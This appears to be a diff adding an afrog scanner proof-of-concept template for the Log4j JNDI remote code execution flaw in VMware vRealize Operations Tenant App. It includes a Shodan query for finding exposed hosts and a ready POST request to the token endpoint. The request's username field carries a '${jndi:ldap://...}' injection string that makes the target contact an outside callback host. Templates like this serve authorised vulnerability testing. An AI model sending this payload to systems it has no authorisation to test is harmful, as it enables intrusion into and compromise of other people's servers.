■ ■ ■ ■ ■ ■
afrog-pocs/vulnerability/vrealize-operations-log4j-rce.yaml
| 1 | + | id: vrealize-operations-log4j-rce |
| 2 | + | |
| 3 | + | info: |
| 4 | + | name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution |
| 5 | + | author: bughuntersurya |
| 6 | + | severity: critical |
| 7 | + | description: | |
| 8 | + | VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application. |
| 9 | + | shodan-query: http.title:"vRealize Operations Tenant App" |
| 10 | + | reference: |
| 11 | + | - https://www.vmware.com/security/advisories/VMSA-2021-0028.html |
| 12 | + | - https://core.vmware.com/vmsa-2021-0028-questions-answers-faq |
| 13 | + | - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 |
| 14 | + | - https://nvd.nist.gov/vuln/detail/CVE-2021-45046 |
| 15 | + | |
| 16 | + | set: |
| 17 | + | rooturl: request.url |
| 18 | + | hostname: request.url.host |
| 19 | + | reverse: newReverse() |
| 20 | + | reverseURL: reverse.url.host |
| 21 | + | rules: |
| 22 | + | r0: |
| 23 | + | request: |
| 24 | + | method: POST |
| 25 | + | path: /suite-api/api/auth/token/acquire |
| 26 | + | headers: |
| 27 | + | Content-Type: application/json |
| 28 | + | Origin: "{{rooturl}}" |
| 29 | + | Referer: "{{rooturl}}/ui/" |
| 30 | + | body: | |
| 31 | + | {"username":"${jndi:ldap://{{hostname}}.{{reverseURL}}}","password":"admin"} |
| 32 | + | expression: reverse.wait(5) |
| 33 | + | expression: r0() |